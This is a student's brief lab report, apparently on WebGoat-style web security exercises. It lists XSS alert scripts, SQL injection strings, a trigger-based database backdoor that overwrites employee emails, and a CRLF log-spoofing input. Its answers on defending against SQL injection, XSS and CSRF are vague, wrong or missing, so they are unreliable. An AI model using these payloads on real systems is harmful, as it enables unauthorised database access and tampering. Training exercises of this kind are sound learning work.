20145207 Exp9 web安全基础实践
Exp9 web安全基础实践
实验后回答问题
(1)SQL注入攻击原理,如何防御
- 攻击原理:修改信息
- 防御:禁止输入
(2)XSS攻击的原理,如何防御
- 攻击原理:看别人的博客,感觉就是强制访问。
- 防御:。。。。。不清楚
(3)CSRF攻击原理,如何防御
没做,不知道
实验总结与体会
指导下完成,就完成个最低标准吧
XSS注入攻击
Stored XSS Attacks
代码: <script>
alert("Hi");
</script>
截图(没法体现学号信息,自己加个水印):
Reflected XSS Attacks
代码:http://www.targetserver.com/search.asp?input=<script>alert("Hi");</script>
截图:
Numeric SQL Injection
- 通过注入SQL字符串,在101旁边加上or 1=1:
Database Backdoors
- 实验目的是实现多条SQL语句的注入,在userid中输入
101 or 1=1;--
- 试验成功
Database Backdoors 2
- 插入两个SQL语句
代码(拷贝的):101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid;
- 实验成功
log Spoofing
-
在用户名中添加hhc%0d%0aLogin Succeeded
盲数字注入(Blind Numeric SQL Injection)
-
存放在pins表中值pin的内容,行号cc_number=1111222233334444,是一个int型
-
-
最后